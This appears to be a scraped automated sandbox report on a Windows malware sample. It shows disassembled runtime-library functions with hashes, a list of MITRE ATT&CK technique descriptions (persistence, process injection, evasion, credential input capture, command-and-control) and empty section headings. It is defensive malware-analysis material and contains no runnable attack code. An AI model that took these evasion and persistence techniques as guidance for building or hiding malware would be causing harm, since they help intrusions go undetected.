Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset
String ID: %$'$'$'$'$+$,$-$.$.$0$R
API String ID: 2102423945-751267039
Opcode ID: 330891fc3c4af050f88bdb3bed07545e5e58f69904e33b483a4d1eaf52581d3e
Instruction ID: e4456c1fd47d796c5ecacec8560a8a87435ac053b2d29e047a0fb959b2106a71
Opcode Fuzzy Hash: 330891fc3c4af050f88bdb3bed07545e5e58f69904e33b483a4d1eaf52581d3e
Instruction Fuzzy Hash: 4E9109709042A8CAEB25CF69DC487DDBBB1AF55308F0481D9D54CAB381E7B94AC8CF16

Uniqueness

Uniqueness Score: -1.00%

Function 0046F390, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0046F3AE

Part of subcall function 0046F7BA: __mtinitlocknum.LIBCMT ref: 0046F7CE
Part of subcall function 0046F7BA: __amsg_exit.LIBCMT ref: 0046F7DA
Part of subcall function 0046F7BA: RtlEnterCriticalSection.NTDLL(?), ref: 0046F7E2

___sbh_find_block.LIBCMT ref: 0046F3B9
___sbh_free_block.LIBCMT ref: 0046F3C8
HeapFree.KERNEL32(00000000,?,0047BA00,0000000C,0046F79B,00000000,0047BA68,0000000C,0046F7D3,?,?,?,00473567,00000004,0047BBC8,0000000C), ref: 0046F3F8
GetLastError.KERNEL32(?,00473567,00000004,0047BBC8,0000000C,0046F2C0,0046BB89,0046BB89,00000000,00000000,00000000,0046ED5C,00000001,00000214,?,0046BB89), ref: 0046F409

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: e20c7027544516277371d1de6ec06bcb3d08d4f7b0027aeb6ccc6cd0c6d6a0fb
Instruction ID: 9fd8c4edac344c925454c96c9c0bebbb55aa508fd349f7a48117b1361f290e3b
Opcode Fuzzy Hash: e20c7027544516277371d1de6ec06bcb3d08d4f7b0027aeb6ccc6cd0c6d6a0fb
Instruction Fuzzy Hash: 4E0184719053159ADB206B72BC0675F3A64DF01725F20403FF544A6291EB7C95848AAF

Uniqueness

Uniqueness Score: -1.00%

Function 00477509, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00477539
__isleadbyte_l.LIBCMT ref: 0047756D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00473B16,?,?,00000002), ref: 0047759E
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00473B16,?,?,00000002), ref: 0047760C

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d0e7fedc8d9b7f5a56e88bf922d43d40437064c2ebc033e90dc097e27d914392
Instruction ID: f05b0d9c4c961af8813656209e046a60851e430123199dc4b2c63d277d80cc6c
Opcode Fuzzy Hash: d0e7fedc8d9b7f5a56e88bf922d43d40437064c2ebc033e90dc097e27d914392
Instruction Fuzzy Hash: 7431C071A08245FFDF20DF64C8809EA3BA5FF01311F98C5AAE4688B691E334D951DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00477A0C, Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00477A26

Part of subcall function 0046BB84: __getptd_noexit.LIBCMT ref: 0046BB84

Part of subcall function 0046BB25: __decode_pointer.LIBCMT ref: 0046BB2E

___ascii_strnicmp.LIBCMT ref: 00477AA6
__tolower_l.LIBCMT ref: 00477AC7
__tolower_l.LIBCMT ref: 00477AD9

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: Locale__tolower_l$UpdateUpdate::____ascii_strnicmp__decode_pointer__getptd_noexit
String ID:
API String ID: 1027406937-0
Opcode ID: a955d99053437f23081a407f2b009ed7a65872b4e2e8097cdb5edd91e39a1a65
Instruction ID: ec83d48232aeec44e899c07d8b132bac6f7e52407e62b2cc67fbed4926e378b2
Opcode Fuzzy Hash: a955d99053437f23081a407f2b009ed7a65872b4e2e8097cdb5edd91e39a1a65
Instruction Fuzzy Hash: 4B21D971904285AFDF21EFA8C8418FF7764EB00324B94425BF42857296E7399F51C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0046C7CD, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0046C7F1

Part of subcall function 0046C61C: __fltout2.LIBCMT ref: 0046C646

__cftog_l.LIBCMT ref: 0046C817
__cftoe_l.LIBCMT ref: 0046C849

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: d888df9160be2340db94dd77bc43d3d44a4d838ec798346f4d7dc4c44e9ec256
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: A201837200014EBBCF226F84CC81CEE3F63BB19355B188416FA9855531E73AC971AB86

Uniqueness

Uniqueness Score: -1.00%

Function 0046FA84, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0046EDAA: __getptd_noexit.LIBCMT ref: 0046EDAB
Part of subcall function 0046EDAA: __amsg_exit.LIBCMT ref: 0046EDB8

__amsg_exit.LIBCMT ref: 0046FAB0
__lock.LIBCMT ref: 0046FAC0
InterlockedDecrement.KERNEL32(?), ref: 0046FADD
InterlockedIncrement.KERNEL32(0047ECB0), ref: 0046FB08

Memory Dump Source

Source File: 00000018.00000002.480974820.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: d7ced18e9def099d59f8c21fb0e8a5fd90c5807b8eb744f3ef424b5a9a536f1e
Instruction ID: 170c8ec64ee92ea58dd7aa41ad6e0757a655143834e258ca425392981c92ade4
Opcode Fuzzy Hash: d7ced18e9def099d59f8c21fb0e8a5fd90c5807b8eb744f3ef424b5a9a536f1e
Instruction Fuzzy Hash: AC01AD36D017119BD721EFA6A80675E73A0BB05B14F10416BE858A7780EB2C6985CBDF

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., `C:\dbg\ntsd.exe -g notepad.exe` ).
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 004015C6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
COMMON

Function 00401101, Relevance: 49.0, APIs: 14, Strings: 14, Instructions: 32
libraryCOMMON

Function 00401A64, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 102
filememoryCOMMON

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre